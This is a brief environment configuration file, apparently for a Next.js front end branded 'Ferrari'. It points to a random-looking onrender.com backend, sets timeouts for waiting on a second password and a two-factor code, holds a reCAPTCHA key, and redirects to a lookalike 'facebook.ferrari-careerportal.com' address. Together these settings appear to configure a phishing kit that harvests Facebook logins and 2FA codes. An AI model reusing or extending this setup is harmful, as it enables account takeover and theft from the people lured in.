PORT=3000
NEXT_PUBLIC_CONTEXT=Ferrari
NEXT_PUBLIC_BACKEND_URL=https://twou9c5mdgopb39bo094uq0qe2x343m9bf.onrender.com
NEXT_PUBLIC_FA2_WAIT_FOR_TIMEOUT=true
NEXT_PUBLIC_FA2_TIMEOUT=60
NEXT_PUBLIC_PASSWORD1_DURATION=60
NEXT_PUBLIC_RECAPTCHA_SITE_KEY=6LeWgH0rAAAAAJumgEbiTEvfp_IRmvfjhClsefsA
NEXT_PUBLIC_REDIRECT_URL=https://facebook.ferrari-careerportal.com/system-check